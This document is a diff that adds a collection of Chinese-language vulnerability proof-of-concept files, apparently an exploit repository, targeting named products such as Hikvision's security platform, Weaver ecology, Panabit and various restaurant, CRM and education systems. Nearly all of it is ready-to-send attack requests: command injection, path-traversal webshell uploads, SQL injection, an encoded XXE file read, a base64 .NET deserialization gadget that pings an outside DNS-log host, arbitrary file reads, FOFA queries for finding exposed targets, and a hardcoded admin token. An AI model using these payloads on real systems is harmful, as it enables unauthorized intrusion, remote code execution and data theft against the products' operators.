+Blade-Auth: bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJ1c2VyX25hbWUiOiJhZG1pbiIsInJlYWxfbmFtZSI6IueuoeeQhuWRmCIsImF1dGhvcml0aWVzIjpbImFkbWluaXN0cmF0b3IiXSwiY2xpZW50X2lkIjoic2FiZXIiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwibGljZW5zZSI6InBvd2VyZWQgYnkgYmxhZGV4IiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwic2NvcGUiOlsiYWxsIl0sIm5pY2tfbmFtZSI6IueuoeeQhuWRmCIsIm9hdXRoX2lkIjoiIiwiZGV0YWlsIjp7InR5cGUiOiJ3ZWIifSwiYWNjb3VudCI6ImFkbWluIn0.RtS67Tmbo7yFKHyMz_bMQW7dfgNjxZW47KtnFcwItxQ
+Connection: close
+```
+
--- a/v1.2.0.14接口WriteFacMac存在远程命令执行漏洞(CVE-2024-41473).md
+++ b/v1.2.0.14接口WriteFacMac存在远程命令执行漏洞(CVE-2024-41473).md
@@ -0,0 +1,13 @@
+```
+import requests
+
+ip = '192.168.74.145'
+
+url = "http://" + ip + "/goform/WriteFacMac"
+payload = ";echo 'hacker!'"
+
+data = {"mac": payload}
+response = requests.post(url, data=data)
+print(response.text)
+```
+
--- a/v1.2.0.14接口exeCommand存在远程命令执行漏洞(CVE-2024-41468).md
+++ b/v1.2.0.14接口exeCommand存在远程命令执行漏洞(CVE-2024-41468).md
@@ -0,0 +1,12 @@
+```
+import requests
+
+ip = '192.168.74.145'
+
+url = f"http://{ip}/goform/exeCommand"
+
+
+data = "cmdinput=ls;"
+ret = requests.post(url=url,data=data)
+```
+
--- a/-SQL注入.md
+++ b/-SQL注入.md
--- a/eking管理易FileUpload接口存在任意文件上传漏洞.md
+++ b/eking管理易FileUpload接口存在任意文件上传漏洞.md
@@ -0,0 +1,13 @@
+```
+POST /app/FileUpload.ihtm?comm_type=EKING&file_name=../../rce.jsp. HTTP/1.1
+Host: 
+User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
+Content-Type: multipart/form-data; boundary=WebKitFormBoundaryHHaZAYecVOf5sfa6
+
+--WebKitFormBoundaryHHaZAYecVOf5sfa6
+Content-Disposition: form-data; name="uplo_file"; filename="rce.jpg"
+
+<% out.println("hello");%>
+--WebKitFormBoundaryHHaZAYecVOf5sfa6--
+```
+
--- a/panabit日志审计系统sprog_upstatus存在SQL注入漏洞.md
+++ b/panabit日志审计系统sprog_upstatus存在SQL注入漏洞.md
@@ -0,0 +1,9 @@
+```
+GET /Maintain/sprog_upstatus.php?status=1&id=1%20and%20updatexml(1,concat(0x7e,user()),0)&rdb=1 HTTP/1.1
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Host: 
+```
+
--- a/SQL注入漏洞.md
+++ b/SQL注入漏洞.md
@@ -0,0 +1,9 @@
+```
+GET /defaultroot/platform/custom/customizecenter/js/getAutoCode.jsp;.js?pageId=1&head=2%27+AND+6205%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2898%29%7C%7CCHR%2866%29%7C%7CCHR%2890%29%7C%7CCHR%28108%29%2C5%29--+YJdO&field=field_name&tabName=tfield HTTP/1.1
+Host: 
+Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
+```
+
--- a/任我行协同CRM反序列化漏洞.md
+++ b/任我行协同CRM反序列化漏洞.md
@@ -0,0 +1,15 @@
+```
+POST /SystemManage/UploadFile HTTP/1.1
+Host: 
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 8
+cmd: whoami
+
+photoInfo={{base64dec(ew0KICAgICckdHlwZSc6J1N5c3RlbS5XaW5kb3dzLkRhdGEuT2JqZWN0RGF0YVByb3ZpZGVyLCBQcmVzZW50YXRpb25GcmFtZXdvcmssIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1JywgDQogICAgJ01ldGhvZE5hbWUnOidTdGFydCcsDQogICAgJ01ldGhvZFBhcmFtZXRlcnMnOnsNCiAgICAgICAgJyR0eXBlJzonU3lzdGVtLkNvbGxlY3Rpb25zLkFycmF5TGlzdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5JywNCiAgICAgICAgJyR2YWx1ZXMnOlsnY21kJywgJy9jIHBpbmcgYWU1d3BiLmRuc2xvZy5jbiddDQogICAgfSwNCiAgICAnT2JqZWN0SW5zdGFuY2UnOnsnJHR5cGUnOidTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSd9DQp9)}}
+```
+
--- a/创客13星零售商城系统RCE.md
+++ b/创客13星零售商城系统RCE.md
@@ -0,0 +1,16 @@
+```
+
+GET /member/my_up_level?phone=%27%29%29%20UNION%20ALL%20SELECT%20CONCAT%28IFNULL%28CAST%28CURRENT_USER%28%29%20AS%20NCHAR%29%2C0x20%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20- HTTP/1.1
+Cache-Control: no-cache
+Cookie: PHPSESSID=6qc94pq3rvpu490r1doentg66a
+User-Agent: sqlmap/1.8.2.1#dev (https://sqlmap.org)
+Host: 127.0.0.1
+Accept: */*
+Accept-Encoding: gzip, deflate
+Connection: close
+```
+
+```
+python sqlmap.py -u "http://127.0.0.1/member/my_up_level?phone=*" --level=3 --dbms=mysql --cookie "PHPSESSID=6qc94pq3rvpu490r1doentg66a"
+```
+
--- a/北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞(CVE-2024-2014).md
+++ b/北京派网软件有限公司Panabit-Panalog大数据日志审计系统sprog_upstatus.php存在SQL注入漏洞(CVE-2024-2014).md
@@ -0,0 +1,9 @@
+```
+GET /Maintain/sprog_upstatus.php?status=1&id=1%20and%20updatexml(1,concat(0x7e,user()),0)&rdb=1 HTTP/1.1
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: keep-alive
+Host: 
+```
+
--- a/喰星云-数字化餐饮服务系统not_finish.php存在SQL注入漏洞.md
+++ b/喰星云-数字化餐饮服务系统not_finish.php存在SQL注入漏洞.md
@@ -0,0 +1,13 @@
+```
+
+GET /logistics/home_warning/php/not_finish.php?do=getList&lsid=(SELECT+(CASE+WHEN+(6192=6193)+THEN+''+ELSE+(SELECT+9641+UNION+SELECT+2384)+END)) HTTP/1.1
+Host: 
+Upgrade-Insecure-Requests: 1
+Priority: u=0, i
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+
+```
+
--- a/喰星云-数字化餐饮服务系统shelflife.php存在SQL注入漏洞.md
+++ b/喰星云-数字化餐饮服务系统shelflife.php存在SQL注入漏洞.md
@@ -0,0 +1,12 @@
+```
+
+GET /logistics/home_warning/php/shelflife.php?do=getList&lsid=(SELECT+(CASE+WHEN+(6193=6193)+THEN+''+ELSE+(SELECT+9641+UNION+SELECT+2384)+END)) HTTP/1.1
+Host: 
+Upgrade-Insecure-Requests: 1
+Priority: u=0, i
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+```
+
--- a/喰星云-数字化餐饮服务系统stock.php存在SQL注入漏洞.md
+++ b/喰星云-数字化餐饮服务系统stock.php存在SQL注入漏洞.md
@@ -0,0 +1,12 @@
+```
+
+GET /logistics/home_warning/php/stock.php?do=getList&lsid=%28SELECT+%28CASE+WHEN+%289764%3D9765%29+THEN+%27%27+ELSE+%28SELECT+7700+UNION+SELECT+3389%29+END%29%29 HTTP/1.1
+Host: 
+Upgrade-Insecure-Requests: 1
+Priority: u=0, i
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+```
+
--- a/喰星云·数字化餐饮服务系统not_out_depot存在SQL注入漏洞.md
+++ b/喰星云·数字化餐饮服务系统not_out_depot存在SQL注入漏洞.md
@@ -0,0 +1,8 @@
+```
+GET /logistics/home_warning/php/not_out_depot.php?do=getList&lsid= HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Accept-Encoding: gzip
+Connection: close
+```
+
--- a/因酷教育平台RCE(CVE-2024-35570).md
+++ b/因酷教育平台RCE(CVE-2024-35570).md
@@ -0,0 +1,23 @@
+```
+POST /image/gok4?&param=image&fileType=jpg,gif,png,jpeg,jspx&pressText=undefined HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------308436435515370414691526924874
+Content-Length: 2853
+Origin: http://192.168.3.102:8080
+Connection: close
+Referer: http://192.168.3.102:8080/admin/website/doUpdateImages/309
+Upgrade-Insecure-Requests: 1
+Priority: u=4
+
+-----------------------------308436435515370414691526924874
+Content-Disposition: form-data; name="uploadfile"; filename="../../../../2.jspx"
+Content-Type: image/jpeg
+
+123
+-----------------------------308436435515370414691526924874--
+```
+
--- a/XML实体注入漏洞.md
+++ b/XML实体注入漏洞.md
@@ -9,8 +9,7 @@ SOAPAction: "http://GB/LK/Document/ArchiveService/ArchiveWebService.asmx/PostArc
 <?xml version="1.0" encoding="utf-8"?>
 <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
-    <PostArchiveInfo xmlns="http://GB/LK/Document/ArchiveService/ArchiveWebService.asmx">
-      <archiveInfo>&#x3c;&#x21;&#x44;&#x4f;&#x43;&#x54;&#x59;&#x50;&#x45;&#x20;&#x41;&#x72;&#x63;&#x68;&#x69;&#x76;&#x65;&#x20;&#x5b;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x21;&#x45;&#x4e;&#x54;&#x49;&#x54;&#x59;&#x20;&#x73;&#x65;&#x63;&#x72;&#x65;&#x74;&#x20;&#x53;&#x59;&#x53;&#x54;&#x45;&#x4d;&#x20;&#x22;&#x66;&#x69;&#x6c;&#x65;&#x3a;&#x2f;&#x2f;&#x2f;&#x77;&#x69;&#x6e;&#x64;&#x6f;&#x77;&#x73;&#x2f;&#x77;&#x69;&#x6e;&#x2e;&#x69;&#x6e;&#x69;&#x22;&#x3e;&#x0a;&#x5d;&#x3e;&#x0a;&#x0a;&#x3c;&#x41;&#x72;&#x63;&#x68;&#x69;&#x76;&#x65;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x41;&#x72;&#x63;&#x68;&#x69;&#x76;&#x65;&#x49;&#x6e;&#x66;&#x6f;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x55;&#x70;&#x6c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x49;&#x44;&#x3e;&#x0a;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x0a;&#x0a;&#x0a;&#x26;&#x73;&#x65;&#x63;&#x72;&#x65;&#x74;&#x3b;&#x0a;&#x0a;&#x0a;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x0a;&#x3c;&#x2f;&#x55;&#x70;&#x6c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x49;&#x44;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x41;&#x72;&#x63;&#x68;&#x69;&#x76;&#x65;&#x49;&#x6e;&#x66;&#x6f;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x52;&#x65;&#x73;&#x75;&#x6c;&#x74;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x4d;&#x61;&#x69;&#x6e;&#x44;&#x6f;&#x63;&#x3e;&#x44;&#x6f;&#x63;&#x75;&#x6d;&#x65;&#x6e;&#x74;&#x20;&#x43;&#x6f;&#x6e;&#x74;&#x65;&#x6e;&#x74;&#x3c;&#x2f;&#x4d;&#x61;&#x69;&#x6e;&#x44;&#x6f;&#x63;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x52;&#x65;&#x73;&#x75;&#x6c;&#x74;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x44;&#x6f;&#x63;&#x49;&#x6e;&#x66;&#x6f;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x44;&#x6f;&#x63;&#x54;&#x79;&#x70;&#x65;&#x49;&#x44;&#x3e;&#x31;&#x3c;&#x2f;&#x44;&#x6f;&#x63;&#x54;&#x79;&#x70;&#x65;&#x49;&#x44;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x44;&#x6f;&#x63;&#x56;&#x65;&#x72;&#x73;&#x69;&#x6f;&#x6e;&#x3e;&#x31;&#x2e;&#x30;&#x3c;&#x2f;&#x44;&#x6f;&#x63;&#x56;&#x65;&#x72;&#x73;&#x69;&#x6f;&#x6e;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x44;&#x6f;&#x63;&#x49;&#x6e;&#x66;&#x6f;&#x3e;&#x20;&#x20;&#x0a;&#x3c;&#x2f;&#x41;&#x72;&#x63;&#x68;&#x69;&#x76;&#x65;&#x3e;</archiveInfo>
+    <PostArchiveInfo xmlns="http://GB/LK/Document/ArchiveService/ArchiveWebService.asmx">   <archiveInfo>&#x3c;&#x21;&#x44;&#x4f;&#x43;&#x54;&#x59;&#x50;&#x45;&#x20;&#x41;&#x72;&#x63;&#x68;&#x69;&#x76;&#x65;&#x20;&#x5b;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x21;&#x45;&#x4e;&#x54;&#x49;&#x54;&#x59;&#x20;&#x73;&#x65;&#x63;&#x72;&#x65;&#x74;&#x20;&#x53;&#x59;&#x53;&#x54;&#x45;&#x4d;&#x20;&#x22;&#x66;&#x69;&#x6c;&#x65;&#x3a;&#x2f;&#x2f;&#x2f;&#x77;&#x69;&#x6e;&#x64;&#x6f;&#x77;&#x73;&#x2f;&#x77;&#x69;&#x6e;&#x2e;&#x69;&#x6e;&#x69;&#x22;&#x3e;&#x0a;&#x5d;&#x3e;&#x0a;&#x0a;&#x3c;&#x41;&#x72;&#x63;&#x68;&#x69;&#x76;&#x65;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x41;&#x72;&#x63;&#x68;&#x69;&#x76;&#x65;&#x49;&#x6e;&#x66;&#x6f;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x55;&#x70;&#x6c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x49;&#x44;&#x3e;&#x0a;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x0a;&#x0a;&#x0a;&#x26;&#x73;&#x65;&#x63;&#x72;&#x65;&#x74;&#x3b;&#x0a;&#x0a;&#x0a;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x23;&#x0a;&#x3c;&#x2f;&#x55;&#x70;&#x6c;&#x6f;&#x61;&#x64;&#x65;&#x72;&#x49;&#x44;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x41;&#x72;&#x63;&#x68;&#x69;&#x76;&#x65;&#x49;&#x6e;&#x66;&#x6f;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x52;&#x65;&#x73;&#x75;&#x6c;&#x74;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x4d;&#x61;&#x69;&#x6e;&#x44;&#x6f;&#x63;&#x3e;&#x44;&#x6f;&#x63;&#x75;&#x6d;&#x65;&#x6e;&#x74;&#x20;&#x43;&#x6f;&#x6e;&#x74;&#x65;&#x6e;&#x74;&#x3c;&#x2f;&#x4d;&#x61;&#x69;&#x6e;&#x44;&#x6f;&#x63;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x52;&#x65;&#x73;&#x75;&#x6c;&#x74;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x44;&#x6f;&#x63;&#x49;&#x6e;&#x66;&#x6f;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x44;&#x6f;&#x63;&#x54;&#x79;&#x70;&#x65;&#x49;&#x44;&#x3e;&#x31;&#x3c;&#x2f;&#x44;&#x6f;&#x63;&#x54;&#x79;&#x70;&#x65;&#x49;&#x44;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x44;&#x6f;&#x63;&#x56;&#x65;&#x72;&#x73;&#x69;&#x6f;&#x6e;&#x3e;&#x31;&#x2e;&#x30;&#x3c;&#x2f;&#x44;&#x6f;&#x63;&#x56;&#x65;&#x72;&#x73;&#x69;&#x6f;&#x6e;&#x3e;&#x20;&#x20;&#x0a;&#x20;&#x20;&#x20;&#x20;&#x3c;&#x2f;&#x44;&#x6f;&#x63;&#x49;&#x6e;&#x66;&#x6f;&#x3e;&#x20;&#x20;&#x0a;&#x3c;&#x2f;&#x41;&#x72;&#x63;&#x68;&#x69;&#x76;&#x65;&#x3e;</archiveInfo>
      <folderIdList>string</folderIdList>
      <platId>string</platId>
    </PostArchiveInfo>
--- a/文件读取漏洞.md
+++ b/文件读取漏洞.md
@@ -0,0 +1,10 @@
+```
+POST /Common/DownLoad2.aspx HTTP/1.1
+Host: 
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0
+Content-Length: 28
+
+path=../log4net.config&Name=
+```
+
--- a/SQL注入漏洞.md
+++ b/SQL注入漏洞.md
@@ -0,0 +1,9 @@
+```
+POST /WXAPI.asmx/GetCustomerLinkman HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
+Content-Type: application/json
+
+{clmID:"1 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- QurA"}
+```
+
--- a/方天云智慧平台系统文件上传.md
+++ b/方天云智慧平台系统文件上传.md
@@ -0,0 +1,24 @@
+fofa
+
+body="AjaxMethods.asmx/GetCompanyItem"
+
+
+
+
+
+```
+POST /Upload.ashx HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySl8siBbmVicABvTX
+Connection: close
+ 
+------WebKitFormBoundarySl8siBbmVicABvTX
+Content-Disposition: form-data; name="file"; filename="qwe.aspx"
+Content-Type: image/jpeg
+ 
+<%@Page Language="C#"%><%Response.Write("hello");System.IO.File.Delete(Request.PhysicalPath);%>
+------WebKitFormBoundarySl8siBbmVicABvTX--
+```
+
+UploadFile/CustomerFile/返回的路径名
--- a/杭州雄威餐厅数字化综合管理平台存在存在绕过认证导致任意密码重置漏洞.md
+++ b/杭州雄威餐厅数字化综合管理平台存在存在绕过认证导致任意密码重置漏洞.md
@@ -0,0 +1,4 @@
+```
+重置密码处，改回包中的code字段为1
+```
+
--- a/泛微HrmService存在SQL注入漏洞.md
+++ b/泛微HrmService存在SQL注入漏洞.md
@@ -0,0 +1,26 @@
+```
+POST /services/HrmService HTTP/1.1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.88 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Connection: close
+SOAPAction: urn:weaver.hrm.webservice.HrmService.getHrmDepartmentInfo
+Content-Type: text/xml;charset=UTF-8
+Host: 
+Content-Length: 427
+X-Forwarded-For: 127.0.0.1
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:hrm="http://localhost/services/HrmService">
+<soapenv:Header/>
+<soapenv:Body>
+<hrm:getHrmDepartmentInfo>
+<!--type: string-->
+<hrm:in0>gero et</hrm:in0>
+<!--type: string-->
+<hrm:in1>1)AND(db_name()like'ec%'</hrm:in1>
+</hrm:getHrmDepartmentInfo>
+</soapenv:Body>
+</soapenv:Envelope>
+```
+
--- a/泛微ecology系统setup接口存在信息泄露漏洞.md
+++ b/泛微ecology系统setup接口存在信息泄露漏洞.md
@@ -0,0 +1,6 @@
+```
+GET /cloudstore/ecode/setup/ecology_dev.zip HTTP/1.1 
+Host: {{Hostname}} 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+```
+
--- a/泛微云桥文件上传.md
+++ b/泛微云桥文件上传.md
@@ -0,0 +1,37 @@
+```http
+POST /wxclient/app/recruit/resume/addResume?fileElementId=H HTTP/1.1
+Host: 127.0.0.1:8088
+Content-Length: 361
+Cache-Control: max-age=0
+sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Windows"
+Upgrade-Insecure-Requests: 1
+Origin: null
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryD5Mawpg068t7pbxZ
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: cross-site
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+
+------WebKitFormBoundaryD5Mawpg068t7pbxZ
+Content-Disposition: form-data; name="file"; filename="shell.jsp"
+Content-Type: application/octet-stream
+
+127
+------WebKitFormBoundaryD5Mawpg068t7pbxZ
+Content-Disposition: form-data; name="file"; filename="shell.jsp"
+Content-Type: application/octet-stream
+
+127
+------WebKitFormBoundaryD5Mawpg068t7pbxZ--
+```
+
+shell地址：
+
+/upload/202408/1-2位大写字母/shell.jsp
--- a/.NET反序列化RCE漏洞poc2.md
+++ b/.NET反序列化RCE漏洞poc2.md
--- a/uploadAllPackage任意文件上传.md
+++ b/uploadAllPackage任意文件上传.md
@@ -0,0 +1,23 @@
+```
+POST /center_install/picUploadService/v1/uploadAllPackage/image HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
+Accept: */*
+Host: 192.168.52.228:8001
+Accept-Encoding: gzip, deflate
+Connection: close
+Token: SElLIGlhL3NmaGNjaTY3WWxWK0Y6UzVCcjg1a2N1dENqVUNIOUM3SE1GamNkN2dnTE1BN1dGTDJldFE0UXFvbz0=
+Content-Type: multipart/form-data; boundary=--------------------------553898708333958420021355
+Content-Length: 233
+
+----------------------------553898708333958420021355
+Content-Disposition: form-data; name="sendfile"; filename="../../../../components/tomcat85linux64.1/webapps/eportal/y4.js"
+Content-Type: application/octet-stream
+
+expzhizhuo
+----------------------------553898708333958420021355--
+```
+
+```
+http://ip/portal/ui/login/..;/..;y4.js
+```
+
--- a/海康威视综合安防管理平台icenseExpire.do存在远程命令执行漏洞.md
+++ b/海康威视综合安防管理平台icenseExpire.do存在远程命令执行漏洞.md
@@ -0,0 +1,45 @@
+**fofa语法：**
+
+app="HIKVISION-综合安防管理平台"
+
+```
+payload：
+POST
+/portal/cas/login/ajax/licenseExpire.do HTTP/1.1
+Host:
+Content-Type:
+application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0;
+Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116
+Safari/537.36
+{"type":"environment","operate":"","machines":{"id":"$(ping+qsdiehtuxn.dgrh3.cn)"}Copy
+to clipboardErrorCopied
+```
+
+```
+文件路径 /vms/static/1.txt payload：
+POST
+/portal/cas/login/ajax/licenseExpire.do HTTP/1.1
+Host:
+Cache-Control: max-age=0
+Accept: application/json, text/javascript,
+*/*; q=0.01
+X-Requested-With: XMLHttpRequest
+If-Modified-Since: Thu, 01 Jun 1970
+00:00:00 GMT
+User-Agent: Mozilla/5.0 (Windows NT 10.0;
+Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0
+Safari/537.36
+Content-Type:
+application/x-www-form-urlencoded
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie:
+JSESSIONID=jp9u6tFmSc3fk7Jzf9DQjK25abfBb_b4Yy1r4rax; curtTabId=all; configMenu=
+Connection: close
+Content-Length: 135
+{"type":"environment","operate":"","machines":{"id":"$(id
+>
+/opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/1.txt)"}
+````
+
--- a/任意文件读取漏洞.md
+++ b/任意文件读取漏洞.md
@@ -0,0 +1,6 @@
+```
+
+GET /base/api/v1/kitchenVideo/downloadWebFile.swagger?fileName=a&ossKey=/jars/mkb-job-admin/application-prod-job-private.yml HTTP/1.1
+Host: 
+```
+
